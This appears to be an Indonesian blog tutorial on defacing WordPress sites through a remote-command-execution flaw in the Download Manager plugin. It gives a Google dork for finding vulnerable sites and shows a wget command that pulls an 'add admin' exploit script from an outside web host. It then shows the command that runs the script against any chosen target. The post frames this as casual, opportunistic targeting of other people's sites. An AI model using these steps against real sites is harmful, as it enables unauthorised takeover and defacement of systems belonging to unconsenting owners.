Deface Plugins Download Manager Remote Command Execution


 hallo gaes,disini gua gabut mending bikin artikel yah :v

bahan:

python:

klik me

wget 

klik me

google dork:

Inurl: index of download manager

Tidak semua vuln yah,disini gua iseng aja waktu itu mau narget web,terus gua scan pake wpsec.com web yang gua scan dia menggunakan plugin dwonload manager dan rentan :D,,coba lihat ss di bawah



oke langkah pertama kalian install dulu python nya,jika python sudah di instal kalian buka folder python nya,kalo saya di pas mau install folder nya di simpan di local disk c,oke kita buka folder python nya terus kalian ke script terus di bar folder kalian tulis cmd seperti di ss




lalu kalian teken enter,maka otomatis cmd kalian terbuka,,lalu ketikan pip2 install requests 

oke saya anggap kalian sudah ngerti karna kalian dlu player termux :v

oke untuk wget nya kalian pindahin ke folder C:\Windows\System kalo udh d pindahin buka cmd kalian lalu kita menuju ke tutor nya

kalian ketik di cmd atau salin tulisan di bawah

wget http://nationalpackaging.in/wp-content/wp_download_manager_274_add_admin.py

python wp_download_manager_274_add_admin.py -t https://target mu/

maka hasil nya akan seperti di bawah





See you happy hacking:D

Don'forget follow my sosial media

Aditya Prtma

"Sekedar Anak Pemalas, Yang Memiliki Ketertarikan Dengan Dunia Hacking, Security & Teknologi"

2 Komentar

Lebih baru Lebih lama